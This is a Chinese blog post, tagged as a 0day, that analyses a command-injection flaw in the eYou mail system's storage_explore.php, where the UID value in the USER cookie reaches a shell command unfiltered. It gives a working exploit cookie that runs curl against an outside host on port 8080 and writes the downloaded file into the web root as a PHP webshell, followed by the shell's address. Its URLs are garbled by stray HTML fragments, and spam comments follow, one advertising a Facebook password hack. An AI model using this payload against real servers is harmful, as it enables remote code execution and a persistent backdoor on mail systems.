『河马』eyou Storage_explore.php Cookie命令注入漏洞利用工具


文件/user/storage_explort.php
<?php
/**
* 用户网络存储列表
*
* 该页面显示登录邮箱用户的网络存储文件列表,选择后添加到邮件的附件中。
*
* @author FengHui <fenghui@eyou.net>
* @copyright 2008 eYou.net
* @version storage_explore.php 2008/05/19
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');

$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);

// 获取用户允许上传的最大附件大小
$attachsize = (int)($userinfo['attachsize'][0]);

$is_submit = $_POST['is_submit'] ? true : false;
?>
跟进getCookieUserValue函数:

function getCookieUserValue($key) {
    $user_arr = explode('&', cookie('USER'));
    $n = count($user_arr);
    for ($i = 0; $i < $n; $i++) {
        $g_arr = explode('=', $user_arr[$i]);
        if ($g_arr[0] == $key) {
            return $g_arr[1];
        }
    }
    return null;
}

跟进cookie函数:
function cookie($name){
    if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
       return '';

整个过程没有对cookie 进行过滤

直接就取那个cookie中USER的值取出来,然后进入了getUserDirPath函数

来看看getUserDirPath函数:

/**
* 获取用户目录的路径
*
* @param string $uid
* @param string $domain
*/
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    echo $cmd;
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

uid和domain直接进入了命令,导致命令执行。



漏洞利用:

将cookie设置为:

USER=UID=1|curl isafe.cc" target="_blank">isafe.cc:8080/test.txt" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc:8080/test.txt>>www.isafe.cc" target="_blank">isafe.cc.php
然后访问localhost/user/storage_explore.php
此时会在localhost/user/下生成www.isafe.cc" target="_blank">isafe.cc.php文件

shell地址为:

localhost/user/www.isafe.cc" target="_blank">isafe.cc.php
只允许会员下载 该文件只允许会员下载! 登录 | 注册

[本日志由 admin 于 2017-10-14 07:51 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 167 | 引用: 0 | 查看次数: 14290
admin [2015-02-22 11:40 AM]
thank you
Dusty [2015-02-22 01:35 AM]
Keep up the amazing work !! Lovin' it!
Herbert [2015-02-19 02:27 AM]
How does a skee-ball app make it this high on a list of the best free Android games.
Sports - Tap - the definitive tool for the fans to the sport anywhere in the world. Talking about battery packs, it has an up time of 9.
Skye [2015-02-16 06:46 PM]
Your info is extremely interesting.

Feel free to surf to my blog free facebook hack password download
Swen [2015-02-15 01:02 PM]
Whoa, such a beneficial website.
Jung [2015-02-14 02:03 AM]
Very good web page you have going here.
Cathleen [2015-02-13 02:29 AM]
Hi, very good online site you've going here.
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭